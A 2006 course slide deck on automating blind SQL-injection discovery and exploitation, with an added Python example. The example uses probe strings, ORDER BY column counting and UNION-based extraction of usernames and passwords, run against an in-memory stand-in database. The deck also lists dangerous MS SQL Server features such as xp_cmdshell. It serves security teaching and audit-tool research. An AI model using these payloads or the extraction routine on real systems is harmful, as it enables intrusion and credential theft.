Automated Estimation and
Evaluation of SQL-injection
Vulnerabilities
Jonas Persson, Group 30 - Language based security
2006
Contents
• The impact of SQL-injection
• Blindfolded SQL-injection
• What has been done before
• Automating the process
• Results
• Conclusions

Impact of SQL-injection
All of the following are Microsoft SQL Server objects and features, the server the rest of this deck targets:
• sysobjects – one row for every object (tables included) in the database
• sysdatabases – one row for every database on the server
• xp_cmdshell – executes arbitrary operating-system commands
• bcp – writes query output to an arbitrary file (run through xp_cmdshell)
• openrowset – transfers data from/to a remote SQL Server
• xp_regwrite – writes arbitrary registry values
• BULK INSERT – loads rows from an arbitrary file, so it doubles as a file reader
Blindfolded SQL-injection
• Should not rely on the contents of error messages
• The only relevant question is: did the query execute or not?
• Procedure:
  • Determine errors
  • Find format and query structure
  • Exploit
What has been done before
• Automated data mining using blindfolded SQL-injection (Absinthe by Cameron Hotchkies)
• Vulnerability scanning tools with support for finding SQL-injections
Limitations
• Absinthe only mines data from existing injections; it does not find the vulnerabilities
• All vulnerability scanning tools I have tested only append a single quote to the end of parameter values and report a vulnerability if the server returns a "500 – internal server error"
Automating the process
Determine errors
• Appending " AND " should give an incorrect-syntax error
• Appending " AND 1=0 " should also result in an error: the query executes but returns no rows, so the page must fail on an empty result for this probe to work
• Appending " AND 1=1 " should not result in an error
Comparing later responses to these three tells us whether appending " AND (any sql) " executed or not
Automating the process
Finding format
• Appending " -- " might comment out closing parentheses that the original query still needs
• Break out of them by closing parentheses one at a time (" ) -- ", " )) -- ", ...) until the query executes
More advanced formats do not require this procedure
Automating the process
Finding the query structure
• How many columns does the query select? Try ordering: " ORDER BY 1 -- ", " ORDER BY 2 -- ", ... until the query fails
• Which types do the selected columns have?
  • Three base types: strings, ints and dates
  • Append " UNION ALL SELECT null -- " (one null per column) to get a union that always executes
  • Then replace one null at a time with 1 (" UNION ALL SELECT 1 -- ") or '1' (" UNION ALL SELECT '1' -- "); the literal that executes reveals that column's type
Automating the process
Once you have found the format and structure, exploiting is easy:
" UNION ALL SELECT columns FROM table -- "
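The four steps from the preceding slides (determine errors, find format, find the query structure, exploit) as one runnable Python example. This is an added example, not the original deck's program or Absinthe. It assumes an in-memory SQLite database standing in for the MS SQL Server target, a hypothetical `vulnerable_page` that splices the parameter into a parenthesised WHERE clause and answers 500 both on a database error and when no row comes back (mimicking a classic ASP page reading an empty recordset), and a `safe_page` that binds the parameter for contrast. Only the status code is consulted, never the error text. The per-column type probe (1 versus '1') is left out because SQLite does not enforce column types.

```python
import sqlite3

# Constructed in-memory stand-in for the target. Assumption: SQLite replaces
# the deck's MS SQL Server; every probe below works the same way on both,
# except the column-type probe (see find_union).
_db = sqlite3.connect(":memory:")
_db.executescript("""
CREATE TABLE products(id INTEGER, name TEXT, added TEXT);
INSERT INTO products VALUES (1, 'widget', '2006-03-01'), (2, 'gadget', '2006-03-02');
CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
INSERT INTO users VALUES (1, 'admin', 's3cret'), (2, 'jonas', 'hunter2');
""")

def vulnerable_page(param):
    """Hypothetical vulnerable page: the parameter is spliced into a
    parenthesised WHERE clause. Like a classic ASP page reading an empty
    recordset it answers 500 on a database error AND when no row comes back."""
    sql = "SELECT id, name, added FROM products WHERE (id = %s)" % param
    try:
        rows = _db.execute(sql).fetchall()
    except sqlite3.Error:
        return 500, []
    return (200, rows) if rows else (500, [])

def safe_page(param):
    """Same page with a bound parameter: appended SQL is data, never code."""
    rows = _db.execute(
        "SELECT id, name, added FROM products WHERE (id = ?)", (param,)).fetchall()
    return (200, rows) if rows else (500, [])

def naive_scan(page, value="1"):
    """The single-quote check the deck criticises: any 500 counts as a hit."""
    return page(value + "'")[0] == 500

def executed(page, value, suffix):
    """Oracle: did the query run with SUFFIX appended? Only the status is
    consulted, never the text of an error message."""
    return page(value + suffix)[0] == 200

def determine_errors(page, value):
    """Step 1: injectable when broken syntax and a false condition both
    break the page while a true condition leaves it working."""
    return (not executed(page, value, " AND ")
            and not executed(page, value, " AND 1=0 ")
            and executed(page, value, " AND 1=1 "))

def find_format(page, value, max_parens=4):
    """Step 2: parentheses to close before ' -- ' can cut off the rest of
    the original query; None if no count up to max_parens works."""
    for n in range(max_parens + 1):
        if executed(page, value, ")" * n + " -- "):
            return n
    return None

def find_column_count(page, value, closing, max_cols=16):
    """Step 3a: ORDER BY n fails once n exceeds the number of columns."""
    count = 0
    for n in range(1, max_cols + 1):
        if not executed(page, value, closing + " ORDER BY %d -- " % n):
            break
        count = n
    return count

def find_union(page, value, closing, ncols):
    """Step 3b: a UNION with one null per column must execute. On MS SQL
    Server the next probe swaps each null for 1 and then '1' to tell int
    from string columns; SQLite enforces no column types, so it is omitted."""
    nulls = ", ".join(["null"] * ncols)
    return executed(page, value, closing + " UNION ALL SELECT " + nulls + " -- ")

def exploit(page, value, closing, ncols, columns, table):
    """Step 4: read COLUMNS from TABLE through the union, padding with null
    and suppressing the page's own rows with a false condition."""
    select = ", ".join(columns + ["null"] * (ncols - len(columns)))
    suffix = " AND 1=0" + closing + " UNION ALL SELECT %s FROM %s -- " % (select, table)
    status, rows = page(value + suffix)
    return rows if status == 200 else []

def assess(page, value="1"):
    """Run the whole procedure against one parameter and report what was found."""
    if not determine_errors(page, value):
        return {"vulnerable": False}
    parens = find_format(page, value)
    if parens is None:
        return {"vulnerable": True, "parens": None}
    closing = ")" * parens
    ncols = find_column_count(page, value, closing)
    report = {"vulnerable": True, "parens": parens, "columns": ncols,
              "union": find_union(page, value, closing, ncols)}
    if report["union"]:
        report["loot"] = exploit(page, value, closing, ncols,
                                 ["username", "password"], "users")
    return report
```

`assess(vulnerable_page)` reports one parenthesis to close, three columns, a working union and the two rows of the constructed users table. `assess(safe_page)` reports not vulnerable, while `naive_scan(safe_page)` still returns True: the bound-parameter page also answers 500 for the value `1'` because no row matches it, which is exactly the false positive that comparing against all three probes avoids.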
Automating the process
Checking the impact
• Selecting from system tables
• Running stored procedures
• Connecting to other servers through openrowset
• Reading files with bulk insert
• Options are limitless!
Results
A program that
• Evaluates a parameter and returns how likely it is that the parameter is vulnerable and exploitable
• Finds format and query structure
• Estimates how vulnerable the parameter is on a scale from 1 to 10
• Reports its findings to the user, detailing the vulnerability and its impact
Conclusions
• As we have just seen, it is indeed possible to automate the search for and exploitation of SQL-injection vulnerabilities
• The example can be extended in many different ways to create either a versatile audit tool or a powerful hacking tool